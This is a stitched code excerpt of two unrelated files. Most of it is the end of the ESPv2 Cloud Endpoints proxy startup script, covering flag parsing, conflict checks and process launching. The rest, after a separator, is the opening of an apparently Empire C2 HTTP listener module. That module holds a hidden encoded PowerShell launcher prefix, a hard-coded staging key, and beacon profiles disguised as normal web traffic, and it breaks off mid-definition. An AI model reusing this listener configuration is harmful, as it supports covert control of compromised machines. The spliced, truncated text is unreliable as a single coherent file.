services. If you deploy ESPv2 outside of Google Cloud environment, you need
to provide a service account credentials file by setting "creds_key"
environment variable or by passing "-k" flag to this script.
''')
parser.add_argument(
'-s',
'--service',
default="",
help=''' Set the name of the Endpoints service. If omitted and -c not
specified, ESPv2 contacts the metadata service to fetch the service
name. ''')
parser.add_argument(
'-v',
'--version',
default="",
help=''' Set the service config ID of the Endpoints service.
If omitted and -c not specified, ESPv2 contacts the metadata
service to fetch the service config ID. ''')
parser.add_argument(
'--service_json_path',
default=None,
help='''
Specify a path for ESPv2 to load the endpoint service config.
With this flag, ESPv2 will use "fixed" rollout strategy and following
flags will be ignored:
--service, --version, and --rollout_strategy.
''')
parser.add_argument(
'-a',
'--backend',
default=DEFAULT_BACKEND,
help='''
Specify the local backend application server address
when using ESPv2 as a sidecar.
Default value is {backend}. Follow the same format when setting
manually. Valid schemes are `http`, `https`, `grpc`, and `grpcs`.
'''.format(backend=DEFAULT_BACKEND))
parser.add_argument('--listener_port', default=None, type=int, help='''
The port to accept downstream connections.
It supports HTTP/1.x, HTTP/2, and gRPC connections.
Default is {port}'''.format(port=DEFAULT_LISTENER_PORT))
parser.add_argument('-N', '--status_port', '--admin_port', default=0,
type=int, help=''' Enable ESPv2 Envoy admin on this port. Please refer
to https://www.envoyproxy.io/docs/envoy/latest/operations/admin.
By default the admin port is disabled.''')
parser.add_argument('--ssl_server_cert_path', default=None, help='''
Proxy's server cert path. When configured, ESPv2 only accepts HTTP/1.x and
HTTP/2 secure connections on listener_port. Requires the certificate and
key files "server.crt" and "server.key" within this path.''')
parser.add_argument('--ssl_backend_client_cert_path', default=None, help='''
Proxy's client cert path. When configured, ESPv2 enables TLS mutual
authentication for HTTPS backends. Requires the certificate and
key files "client.crt" and "client.key" within this path.''')
parser.add_argument('--ssl_backend_client_root_certs_file', default=None, help='''
The file path of root certificates that ESPv2 uses to verify backend server certificate.
If not specified, ESPv2 uses '/etc/ssl/certs/ca-certificates.crt' by default.''')
parser.add_argument('--ssl_minimum_protocol', default=None,
choices=['TLSv1.0', 'TLSv1.1', 'TLSv1.2', 'TLSv1.3'],
help=''' Minimum TLS protocol version for client side connection.
Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/cert.proto#common-tls-configuration.
''')
parser.add_argument('--ssl_maximum_protocol', default=None,
choices=['TLSv1.0', 'TLSv1.1', 'TLSv1.2', 'TLSv1.3'],
help=''' Maximum TLS protocol version for client side connection.
Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/cert.proto#common-tls-configuration.
''')
parser.add_argument('--enable_strict_transport_security', action='store_true',
help='''Enable HSTS (HTTP Strict Transport Security). "Strict-Transport-Security" response header
with value "max-age=31536000; includeSubdomains;" is added for all responses from local backend.
Not valid for remote backends.''')
parser.add_argument('--generate_self_signed_cert', action='store_true',
help='''Generate a self-signed certificate and key at start, then
store them in /tmp/ssl/endpoints/server.crt and /tmp/ssl/endpoints/server.key.
This is useful when only a random self-sign cert is needed to serve
HTTPS requests. Generated certificate will have Common Name
"localhost" and valid for 10 years.
''')
parser.add_argument('-z', '--healthz', default=None, help='''Define a
health checking endpoint on the same ports as the application backend.
For example, "-z healthz" makes ESPv2 return code 200 for location
"/healthz", instead of forwarding the request to the backend. Please
don't use any paths conflicting with your normal requests.
Default: not used.''')
parser.add_argument(
'-R',
'--rollout_strategy',
default=DEFAULT_ROLLOUT_STRATEGY,
help='''The service config rollout strategy, [fixed|managed],
Default value: {strategy}'''.format(strategy=DEFAULT_ROLLOUT_STRATEGY),
choices=['fixed', 'managed'])
# Customize management service url prefix.
parser.add_argument(
'-g',
'--management',
default=None,
help=argparse.SUPPRESS)
# CORS presets
parser.add_argument(
'--cors_preset',
default=None,
help='''
Enables setting of CORS headers. This is useful when using a GRPC
backend, since a GRPC backend cannot set CORS headers.
Specify one of available presets to configure CORS response headers
in nginx. Defaults to no preset and therefore no CORS response
headers. If no preset is suitable for the use case, use the
--nginx_config arg to use a custom nginx config file.
Available presets:
- basic - Assumes all location paths have the same CORS policy.
Responds to preflight OPTIONS requests with an empty 204, and the
results of preflight are allowed to be cached for up to 20 days
(1728000 seconds). See descriptions for args --cors_allow_origin,
--cors_allow_methods, --cors_allow_headers, --cors_expose_headers,
--cors_allow_credentials for more granular configurations.
- cors_with_regex - Same as basic preset, except that specifying
allowed origins in regular expression. See descriptions for args
--cors_allow_origin_regex, --cors_allow_methods,
--cors_allow_headers, --cors_expose_headers, --cors_allow_credentials
for more granular configurations.
''')
parser.add_argument(
'--cors_allow_origin',
default='*',
help='''
Only works when --cors_preset is 'basic'. Configures the CORS header
Access-Control-Allow-Origin. Defaults to "*" which allows all origins.
''')
parser.add_argument(
'--cors_allow_origin_regex',
default='',
help='''
Only works when --cors_preset is 'cors_with_regex'. Configures the
whitelists of CORS header Access-Control-Allow-Origin with regular
expression.
''')
parser.add_argument(
'--cors_allow_methods',
default='GET, POST, PUT, PATCH, DELETE, OPTIONS',
help='''
Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Allow-Methods. Defaults to allow common HTTP
methods.
''')
parser.add_argument(
'--cors_allow_headers',
default=
'DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization',
help='''
Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Allow-Headers. Defaults to allow common HTTP
headers.
''')
parser.add_argument(
'--cors_expose_headers',
default='Content-Length,Content-Range',
help='''
Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Expose-Headers. Defaults to allow common response headers.
''')
parser.add_argument(
'--cors_allow_credentials',
action='store_true',
help='''
Only works when --cors_preset is in use. Enable the CORS header
Access-Control-Allow-Credentials. By default, this header is disabled.
''')
parser.add_argument(
'--check_metadata',
action='store_true',
help='''Enable fetching service name, service config ID and rollout
strategy from the metadata service.''')
parser.add_argument('--underscores_in_headers', action='store_true',
help='''Allow headers contain underscores to pass through. By default
ESPv2 rejects requests that have headers with underscores.''')
parser.add_argument(
'--envoy_use_remote_address',
action='store_true',
default=False,
help='''Envoy HttpConnectionManager configuration, please refer to envoy
documentation for detailed information.''')
parser.add_argument(
'--envoy_xff_num_trusted_hops',
default=None,
help='''Envoy HttpConnectionManager configuration, please refer to envoy
documentation for detailed information. The default value is 2 for
sidecar deployments and 0 for serverless deployments.''')
parser.add_argument(
'--log_request_headers',
default=None,
help='''Log corresponding request headers through
service control, separated by comma. Example, when
--log_request_headers=foo,bar, endpoint log will have
request_headers: foo=foo_value;bar=bar_value if values are available;
''')
parser.add_argument(
'--log_response_headers',
default=None,
help='''Log corresponding response headers through
service control, separated by comma. Example, when
--log_response_headers=foo,bar, endpoint log will have
response_headers: foo=foo_value;bar=bar_value if values are available;
''')
parser.add_argument(
'--log_jwt_payloads',
default=None,
help='''
Log corresponding JWT JSON payload primitive fields through service control,
separated by comma. Example, when --log_jwt_payload=sub,project_id, log
will have jwt_payload: sub=[SUBJECT];project_id=[PROJECT_ID]
if the fields are available. The value must be a primitive field,
JSON objects and arrays will not be logged.
''')
parser.add_argument(
'--service_control_network_fail_open',
default=True,
action='store_true',
help='''
In case of network failures when connecting to Google service control,
the requests will be allowed if this flag is on. The default is on.
''')
parser.add_argument(
'--jwks_cache_duration_in_s',
default=None,
help='''
Specify JWT public key cache duration in seconds. The default is 5 minutes.'''
)
parser.add_argument(
'--http_request_timeout_s',
default=None, type=int,
help='''
Set the timeout in seconds for all requests made to all external services
from ESPv2 (ie. Service Management, Instance Metadata Server, etc.).
This timeout does not apply to requests proxied to the backend.
Must be > 0 and the default is 30 seconds if not set.
''')
parser.add_argument(
'--service_control_check_timeout_ms',
default=None,
help='''
Set the timeout in millisecond for service control Check request.
Must be > 0 and the default is 1000 if not set.
''')
parser.add_argument(
'--service_control_quota_timeout_ms',
default=None,
help='''
Set the timeout in millisecond for service control Quota request.
Must be > 0 and the default is 1000 if not set.
''')
parser.add_argument(
'--service_control_report_timeout_ms',
default=None,
help='''
Set the timeout in millisecond for service control Report request.
Must be > 0 and the default is 2000 if not set.
''')
parser.add_argument(
'--service_control_check_retries',
default=None,
help='''
Set the retry times for service control Check request.
Must be >= 0 and the default is 3 if not set.
''')
parser.add_argument(
'--service_control_quota_retries',
default=None,
help='''
Set the retry times for service control Quota request.
Must be >= 0 and the default is 1 if not set.
''')
parser.add_argument(
'--service_control_report_retries',
default=None,
help='''
Set the retry times for service control Report request.
Must be >= 0 and the default is 5 if not set.
''')
parser.add_argument(
'--access_log',
help='''
Path to a local file to which the access log entries will be written.
'''
)
parser.add_argument(
'--access_log_format',
help='''
String format to specify the format of access log. If unset, the
following format will be used.
https://www.envoyproxy.io/docs/envoy/latest/configuration/observability/access_log#default-format-string
For the detailed format grammar, please refer to the following document.
https://www.envoyproxy.io/docs/envoy/latest/configuration/observability/access_log#format-strings
'''
)
parser.add_argument(
'--disable_tracing',
action='store_true',
default=False,
help='''
Disable Stackdriver tracing. By default, tracing is enabled with 1 out
of 1000 requests being sampled. This sampling rate can be changed with
the --tracing_sample_rate flag.
'''
)
parser.add_argument(
'--tracing_project_id',
default="",
help="The Google project id for Stack driver tracing")
parser.add_argument(
'--tracing_sample_rate',
help='''
Tracing sampling rate from 0.0 to 1.0.
By default, 1 out of 1000 requests are sampled.
Cloud trace can still be enabled from request HTTP headers with
trace context regardless this flag value.
'''
)
parser.add_argument(
'--disable_cloud_trace_auto_sampling',
action='store_true',
default=False,
help="An alias to override --tracing_sample_rate to 0")
parser.add_argument(
'--tracing_incoming_context',
default="",
help='''
comma separated incoming trace contexts (traceparent|grpc-trace-bin|x-cloud-trace-context)'''
)
parser.add_argument(
'--tracing_outgoing_context',
default="",
help='''
comma separated outgoing trace contexts (traceparent|grpc-trace-bin|x-cloud-trace-context)'''
)
parser.add_argument(
'--cloud_trace_url_override',
default="",
help='''
By default, traces will be sent to production Stackdriver Tracing.
If this is non-empty, ESPv2 will send traces to this gRPC service instead.
The url must be in gRPC format.
https://github.com/grpc/grpc/blob/master/doc/naming.md
The gRPC service must implement the cloud trace v2 RPCs.
https://github.com/googleapis/googleapis/tree/master/google/devtools/cloudtrace/v2
'''
)
parser.add_argument(
'--non_gcp',
action='store_true',
default=False,
help='''
By default, the proxy tries to talk to GCP metadata server to get VM
location in the first few requests. Setting this flag to true to skip
this step.
''')
parser.add_argument(
'--service_account_key',
help='''
Use the service account key JSON file to access the service control and the
service management. You can also set {creds_key} environment variable to
the location of the service account credentials JSON file. If the option is
omitted, the proxy contacts the metadata service to fetch an access token.
'''.format(creds_key=GOOGLE_CREDS_KEY))
parser.add_argument(
'--dns_resolver_addresses',
help='''
The addresses of dns resolvers. Each address should be in format of
IP_ADDR or IP_ADDR:PORT and they are separated by ';'. For the IP_ADDR
case, the default DNS port 53 will be used. (e.g.,
--dns_resolver_addresses=127.0.0.1;127.0.0.2;127.0.0.3:8000)
If unset, will use the default resolver configured in /etc/resolv.conf.
''')
parser.add_argument(
'--backend_dns_lookup_family',
default=None,
choices=['auto', 'v4only', 'v6only'],
help='''
Define the dns lookup family for all backends. The options are "auto", "v4only" and "v6only". The default is "auto".
''')
parser.add_argument('--enable_debug', action='store_true', default=False,
help='''
Enables a variety of debug features in both Config Manager and Envoy, such as:
- Debug level per-request application logs in Envoy
- Debug level service configuration logs in Config Manager
- Debug HTTP response headers
''')
parser.add_argument(
'--transcoding_always_print_primitive_fields',
action='store_true', help='''Whether to always print primitive fields
for grpc-json transcoding. By default primitive fields with default
values will be omitted in JSON output. For example, an int32 field set
to 0 will be omitted. Setting this flag to true will override the
default behavior and print primitive fields regardless of their values.
Defaults to false
''')
parser.add_argument(
'--transcoding_always_print_enums_as_ints', action='store_true',
help='''Whether to always print enums as ints for grpc-json transcoding.
By default they are rendered as strings. Defaults to false.''')
parser.add_argument(
'--transcoding_preserve_proto_field_names', action='store_true',
help='''Whether to preserve proto field names for grpc-json transcoding.
By default protobuf will generate JSON field names using the json_name
option, or lower camel case, in that order. Setting this flag will
preserve the original field names. Defaults to false''')
parser.add_argument(
'--transcoding_ignore_query_parameters', default=None,
help='''
A list of query parameters(separated by comma) to be ignored for
transcoding method mapping in grpc-json transcoding. By default, the
transcoder filter will not transcode a request if there are any
unknown/invalid query parameters.
''')
parser.add_argument(
'--transcoding_ignore_unknown_query_parameters', action='store_true',
help='''
Whether to ignore query parameters that cannot be mapped to a
corresponding protobuf field in grpc-json transcoding. Use this if you
cannot control the query parameters and do not know them beforehand.
Otherwise use ignored_query_parameters. Defaults to false.
''')
# Start Deprecated Flags Section
parser.add_argument(
'--enable_backend_routing',
action='store_true',
default=False,
help='''
===
DEPRECATED: This flag will automatically be enabled if needed, so it
does NOT need to be set manually.
===
Enable ESPv2 to route requests according to the
"x-google-backend" or "backend" configuration
''')
parser.add_argument(
'--backend_protocol',
default=None,
help='''
===
DEPRECATED: This flag will automatically be set based on the scheme
specified in the --backend flag. Overrides are no longer needed.
===
Backend Protocol. Overrides the protocol in --backend.
Choices: [http1|http2|grpc].
Default value: http1.''',
choices=['http1', 'http2', 'grpc'])
parser.add_argument('--http_port', default=None, type=int, help='''
This flag is exactly the same as --listener_port. It is added for
backward compatibility with ESPv1 and will be deprecated.
Please use the flag --listener_port.''')
parser.add_argument('--http2_port', default=None, type=int, help='''
This flag is exactly the same as --listener_port. It is added for
backward compatibility with ESPv1 and will be deprecated.
Please use the flag --listener_port.''')
parser.add_argument('--ssl_port', default=None, type=int, help='''
This flag is added for backward compatibility with ESPv1 and will be deprecated.
Please use the flags --listener_port and --ssl_server_cert_path instead.
When configured, ESPv2 accepts HTTP/1.x and HTTP/2 secure connections on this port,
Requires the certificate and key files /etc/nginx/ssl/nginx.crt and
/etc/nginx/ssl/nginx.key''')
parser.add_argument('--dns', help='''
This flag is exactly the same as --dns_resolver_addresses. It is added
for backward compatibility with ESPv1 and will be deprecated.
Please use the flag --dns_resolver_addresses instead.''')
parser.add_argument('-t', '--tls_mutual_auth', action='store_true', help='''
This flag is added for backward compatibility with ESPv1 and will be deprecated.
Please use the flag --ssl_backend_client_cert_path instead.
Enable TLS mutual authentication for HTTPS backends.
Default value: Not enabled. Please provide the certificate and key files
/etc/nginx/ssl/backend.crt and /etc/nginx/ssl/backend.key.''')
parser.add_argument('--ssl_protocols',
default=None, action='append', help='''
This flag is added for backward compatibility with ESPv1 and will be deprecated.
Please use the flag --ssl_minimum_protocol and --ssl_maximum_protocol
instead.
Enable the specified SSL protocols. Please refer to
https://nginx.org/en/docs/http/ngx_http_ssl_module.html#ssl_protocols.
The "ssl_protocols" argument can be repeated multiple times to specify multiple
SSL protocols (e.g., --ssl_protocols=TLSv1.1 --ssl_protocols=TLSv1.2).
''')
parser.add_argument('--enable_grpc_backend_ssl',
action='store_true', help='''
This flag is added for backward compatibility with ESPv1 and will be deprecated.
Enable SSL for gRPC backend. ESPv2 auto enables SSL if schema `grpcs` is
detected.''')
parser.add_argument('--grpc_backend_ssl_root_certs_file',
default='/etc/nginx/trusted-ca-certificates.crt',
help='''This flag is added for backward compatibility with ESPv1 and will be deprecated.
ESPv2 uses `/etc/ssl/certs/ca-certificates.crt` by default.
The file path for gRPC backend SSL root certificates.''')
parser.add_argument('--ssl_client_cert_path', default=None, help='''
This flag is renamed and deprecated for clarity.
Use `--ssl_backend_client_cert_path` instead.''')
parser.add_argument('--ssl_client_root_certs_file', default=None, help='''
This flag is renamed and deprecated for clarity.
Use `--ssl_backend_client_root_certs_file` instead.''')
# End Deprecated Flags Section
# Start internal flags section
parser.add_argument(
'--on_serverless',
action='store_true',
default=False,
help='''
When ESPv2 is started via the serverless image, this is true.
''')
# End internal flags section
return parser
# Check whether there are conflicting flags. If so, return an error string.
# Otherwise return None. This function also changes some default flag values.
def enforce_conflict_args(args):
if args.rollout_strategy:
if args.rollout_strategy != DEFAULT_ROLLOUT_STRATEGY:
if args.version:
return "Flag --version cannot be used together with -R or --rollout_strategy."
if args.service_json_path:
return "Flag -R or --rollout_strategy must be fixed with --service_json_path."
if args.service_json_path:
if args.service:
return "Flag --service cannot be used together with --service_json_path."
if args.version:
return "Flag --version cannot be used together with --service_json_path."
if args.non_gcp:
if args.service_account_key is None and GOOGLE_CREDS_KEY not in os.environ:
return "If --non_gcp is specified, --service_account_key has to be specified, or GOOGLE_APPLICATION_CREDENTIALS has to set in os.environ."
if not args.tracing_project_id:
# for non gcp case, disable tracing if tracing project id is not provided.
args.disable_tracing = True
if not args.access_log and args.access_log_format:
return "Flag --access_log_format has to be used together with --access_log."
if args.ssl_port and args.ssl_server_cert_path:
return "Flag --ssl_port is going to be deprecated, please use --ssl_server_cert_path only."
if args.tls_mutual_auth and (args.ssl_backend_client_cert_path or args.ssl_client_cert_path):
return "Flag --tls_mutual_auth is going to be deprecated, please use --ssl_backend_client_cert_path only."
if (args.ssl_backend_client_root_certs_file or args.ssl_client_root_certs_file) and args.enable_grpc_backend_ssl:
return "Flag --enable_grpc_backend_ssl are going to be deprecated, please use --ssl_backend_client_root_certs_file only."
if args.generate_self_signed_cert and args.ssl_server_cert_path:
return "Flag --generate_self_signed_cert and --ssl_server_cert_path cannot be used simutaneously."
port_flags = []
port_num = DEFAULT_LISTENER_PORT
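# At most one port flag may be given; remember which ones were set and the resulting port for the checks below.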
if args.http_port:
port_flags.append("--http_port")
port_num = args.http_port
if args.http2_port:
port_flags.append("--http2_port")
port_num = args.http2_port
if args.listener_port:
port_flags.append("--listener_port")
port_num = args.listener_port
if args.ssl_port:
port_flags.append("--ssl_port")
port_num = args.ssl_port
if len(port_flags) > 1:
return "Multiple port flags {} are not allowed, use only the --listener_port flag".format(",".join(port_flags))
elif port_num < 1024:
return "Port {} is a privileged port. " \
"For security purposes, the ESPv2 container cannot bind to it. " \
"Use any port above 1024 instead.".format(port_num)
if args.ssl_protocols and (args.ssl_minimum_protocol or args.ssl_maximum_protocol):
return "Flag --ssl_protocols is going to be deprecated, please use --ssl_minimum_protocol and --ssl_maximum_protocol."
if args.transcoding_ignore_query_parameters \
and args.transcoding_ignore_unknown_query_parameters:
return "Flag --transcoding_ignore_query_parameters cannot be used" \
" together with --transcoding_ignore_unknown_query_parameters."
if args.dns_resolver_addresses and args.dns:
return "Flag --dns_resolver_addresses cannot be used together with" \
" together with --dns."
if args.ssl_backend_client_cert_path and args.ssl_client_cert_path:
return "Flag --ssl_client_cert_path is renamed to " \
"--ssl_backend_client_cert_path, only use the latter flag."
if args.ssl_backend_client_root_certs_file and args.ssl_client_root_certs_file:
return "Flag --ssl_client_root_certs_file is renamed to " \
"--ssl_backend_client_root_certs_file, only use the latter flag."
return None
def gen_proxy_config(args):
check_conflict_result = enforce_conflict_args(args)
if check_conflict_result:
logging.error(check_conflict_result)
sys.exit(1)
proxy_conf = [
CONFIGMANAGER_BIN,
"--logtostderr",
"--rollout_strategy", args.rollout_strategy,
]
if "://" not in args.backend:
proxy_conf.extend(["--backend_address", "http://" + args.backend])
else:
proxy_conf.extend(["--backend_address", args.backend])
if args.healthz:
proxy_conf.extend(["--healthz", args.healthz])
if args.enable_debug:
proxy_conf.extend(["--v", "1"])
else:
proxy_conf.extend(["--v", "0"])
if args.envoy_xff_num_trusted_hops:
proxy_conf.extend(["--envoy_xff_num_trusted_hops",
args.envoy_xff_num_trusted_hops])
elif args.on_serverless:
proxy_conf.extend(["--envoy_xff_num_trusted_hops",
'{}'.format(SERVERLESS_XFF_NUM_TRUSTED_HOPS)])
if args.jwks_cache_duration_in_s:
proxy_conf.extend(["--jwks_cache_duration_in_s", args.jwks_cache_duration_in_s])
if args.management:
proxy_conf.extend(["--service_management_url", args.management])
if args.log_request_headers:
proxy_conf.extend(["--log_request_headers", args.log_request_headers])
if args.log_response_headers:
proxy_conf.extend(["--log_response_headers", args.log_response_headers])
if args.log_jwt_payloads:
proxy_conf.extend(["--log_jwt_payloads", args.log_jwt_payloads])
if args.http_port:
proxy_conf.extend(["--listener_port", str(args.http_port)])
if args.http2_port:
proxy_conf.extend(["--listener_port", str(args.http2_port)])
if args.listener_port:
proxy_conf.extend(["--listener_port", str(args.listener_port)])
if args.ssl_server_cert_path:
proxy_conf.extend(["--ssl_server_cert_path", str(args.ssl_server_cert_path)])
if args.ssl_port:
proxy_conf.extend(["--ssl_server_cert_path", "/etc/nginx/ssl"])
proxy_conf.extend(["--listener_port", str(args.ssl_port)])
if args.ssl_backend_client_cert_path:
proxy_conf.extend(["--ssl_backend_client_cert_path", str(args.ssl_backend_client_cert_path)])
if args.ssl_client_cert_path:
proxy_conf.extend(["--ssl_backend_client_cert_path", str(args.ssl_client_cert_path)])
if args.enable_grpc_backend_ssl and args.grpc_backend_ssl_root_certs_file:
proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.grpc_backend_ssl_root_certs_file)])
if args.ssl_backend_client_root_certs_file:
proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.ssl_backend_client_root_certs_file)])
if args.ssl_client_root_certs_file:
proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.ssl_client_root_certs_file)])
if args.tls_mutual_auth:
proxy_conf.extend(["--ssl_backend_client_cert_path", "/etc/nginx/ssl"])
if args.ssl_minimum_protocol:
proxy_conf.extend(["--ssl_minimum_protocol", args.ssl_minimum_protocol])
if args.ssl_maximum_protocol:
proxy_conf.extend(["--ssl_maximum_protocol", args.ssl_maximum_protocol])
if args.ssl_protocols:
args.ssl_protocols.sort()
proxy_conf.extend(["--ssl_minimum_protocol", args.ssl_protocols[0]])
proxy_conf.extend(["--ssl_maximum_protocol", args.ssl_protocols[-1]])
# Generate self-signed cert if needed
if args.generate_self_signed_cert:
if not os.path.exists("/tmp/ssl/endpoints"):
os.makedirs("/tmp/ssl/endpoints")
logging.info("Generating self-signed certificate...")
os.system(("openssl req -x509 -newkey rsa:2048"
" -keyout /tmp/ssl/endpoints/server.key -nodes"
" -out /tmp/ssl/endpoints/server.crt"
' -days 3650 -subj "/CN=localhost"'))
proxy_conf.extend(["--ssl_server_cert_path", "/tmp/ssl/endpoints"])
if args.enable_strict_transport_security:
proxy_conf.append("--enable_strict_transport_security")
if args.service:
proxy_conf.extend(["--service", args.service])
if args.http_request_timeout_s:
proxy_conf.extend( ["--http_request_timeout_s", str(args.http_request_timeout_s)])
if args.service_control_check_retries:
proxy_conf.extend([
"--service_control_check_retries",
args.service_control_check_retries
])
if args.service_control_quota_retries:
proxy_conf.extend([
"--service_control_quota_retries",
args.service_control_quota_retries
])
if args.service_control_report_retries:
proxy_conf.extend([
"--service_control_report_retries",
args.service_control_report_retries
])
if args.service_control_check_timeout_ms:
proxy_conf.extend([
"--service_control_check_timeout_ms",
args.service_control_check_timeout_ms
])
if args.service_control_quota_timeout_ms:
proxy_conf.extend([
"--service_control_quota_timeout_ms",
args.service_control_quota_timeout_ms
])
if args.service_control_report_timeout_ms:
proxy_conf.extend([
"--service_control_report_timeout_ms",
args.service_control_report_timeout_ms
])
# NOTE: It is true by default in configmanager's flags.
if not args.service_control_network_fail_open:
proxy_conf.extend(["--service_control_network_fail_open=false"])
if args.version:
proxy_conf.extend(["--service_config_id", args.version])
if args.service_json_path:
proxy_conf.extend(["--service_json_path", args.service_json_path])
if args.check_metadata:
proxy_conf.append("--check_metadata")
if args.underscores_in_headers:
proxy_conf.append("--underscores_in_headers")
if args.access_log:
proxy_conf.extend(["--access_log",
args.access_log])
if args.access_log_format:
proxy_conf.extend(["--access_log_format",
args.access_log_format])
if args.disable_tracing:
proxy_conf.append("--disable_tracing")
else:
if args.tracing_project_id:
proxy_conf.extend(["--tracing_project_id", args.tracing_project_id])
if args.tracing_incoming_context:
proxy_conf.extend(
["--tracing_incoming_context", args.tracing_incoming_context])
if args.tracing_outgoing_context:
proxy_conf.extend(
["--tracing_outgoing_context", args.tracing_outgoing_context])
if args.cloud_trace_url_override:
proxy_conf.extend(["--tracing_stackdriver_address",
args.cloud_trace_url_override])
if args.disable_cloud_trace_auto_sampling:
proxy_conf.extend(["--tracing_sample_rate", "0"])
elif args.tracing_sample_rate:
proxy_conf.extend(["--tracing_sample_rate",
str(args.tracing_sample_rate)])
if args.transcoding_always_print_primitive_fields:
proxy_conf.append("--transcoding_always_print_primitive_fields")
if args.transcoding_always_print_enums_as_ints:
proxy_conf.append("--transcoding_always_print_enums_as_ints")
if args.transcoding_preserve_proto_field_names:
proxy_conf.append("--transcoding_preserve_proto_field_names")
if args.transcoding_ignore_query_parameters:
proxy_conf.extend(["--transcoding_ignore_query_parameters",
args.transcoding_ignore_query_parameters])
if args.transcoding_ignore_unknown_query_parameters:
proxy_conf.append("--transcoding_ignore_unknown_query_parameters")
if args.on_serverless:
proxy_conf.extend([
"--compute_platform_override", SERVERLESS_PLATFORM])
if args.backend_dns_lookup_family:
proxy_conf.extend(
["--backend_dns_lookup_family", args.backend_dns_lookup_family])
if args.dns_resolver_addresses:
proxy_conf.extend(
["--dns_resolver_addresses", args.dns_resolver_addresses])
if args.dns:
proxy_conf.extend(
["--dns_resolver_addresses", args.dns]
)
if args.envoy_use_remote_address:
proxy_conf.append("--envoy_use_remote_address")
if args.cors_preset:
proxy_conf.extend([
"--cors_preset",
args.cors_preset,
"--cors_allow_origin",
args.cors_allow_origin,
"--cors_allow_origin_regex",
args.cors_allow_origin_regex,
"--cors_allow_methods",
args.cors_allow_methods,
"--cors_allow_headers",
args.cors_allow_headers,
"--cors_expose_headers",
args.cors_expose_headers,
])
if args.cors_allow_credentials:
proxy_conf.append("--cors_allow_credentials")
# Set credentials file from the environment variable
if args.service_account_key is None and GOOGLE_CREDS_KEY in os.environ:
args.service_account_key = os.environ[GOOGLE_CREDS_KEY]
if args.service_account_key:
proxy_conf.extend(["--service_account_key", args.service_account_key])
if args.non_gcp:
proxy_conf.append("--non_gcp")
if args.enable_debug:
proxy_conf.append("--suppress_envoy_headers=false")
return proxy_conf
def gen_envoy_args(args):
cmd = [ENVOY_BIN, "-c", DEFAULT_CONFIG_DIR + BOOTSTRAP_CONFIG,
"--disable-hot-restart",
# This will print logs in `glog` format.
# Stackdriver logging integrates nicely with this format.
"--log-format %L%m%d %T.%e %t envoy] [%t][%n]%v",
"--log-format-escaped"]
if args.enable_debug:
# Enable debug logging, but not for everything... too noisy otherwise.
cmd.append("-l debug")
cmd.append("--component-log-level upstream:info,main:info")
return cmd
def output_reader(proc):
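# Stream a child process's stdout to our stdout, line by line, until the pipe closes.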
for line in iter(proc.stdout.readline, b''):
sys.stdout.write(line.decode())
def start_config_manager(proxy_conf):
print("Starting Config Manager with args: {}".format(proxy_conf))
proc = subprocess.Popen(proxy_conf,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
t = threading.Thread(target=output_reader, args=(proc,))
t.start()
return proc
def start_envoy(args):
subprocess.call(gen_bootstrap_conf(args))
cmd = gen_envoy_args(args)
print("Starting Envoy with args: {}".format(cmd))
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
t = threading.Thread(target=output_reader, args=(proc,))
t.start()
return proc
if __name__ == '__main__':
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)
parser = make_argparser()
args = parser.parse_args()
cm_proc = start_config_manager(gen_proxy_config(args))
envoy_proc = start_envoy(args)
while True:
time.sleep(HEALTH_CHECK_PERIOD)
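# Popen.poll() returns None while the child is still running and its exit code once it has exited.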
if not cm_proc or cm_proc.poll() is not None:
logging.fatal("Config Manager is down, killing all processes.")
if envoy_proc:
os.kill(envoy_proc.pid, signal.SIGKILL)
sys.exit(1)
if not envoy_proc or envoy_proc.poll() is not None:
logging.fatal("Envoy is down, killing all processes.")
if cm_proc:
os.kill(cm_proc.pid, signal.SIGKILL)
sys.exit(1)
|
http.py
|
import logging
import base64
import sys
import random
import string
import os
import ssl
import time
import copy
import json
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response, send_from_directory
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import templating
from lib.common import obfuscation
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts an http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s" % (helpers.lhost())
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : ''
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
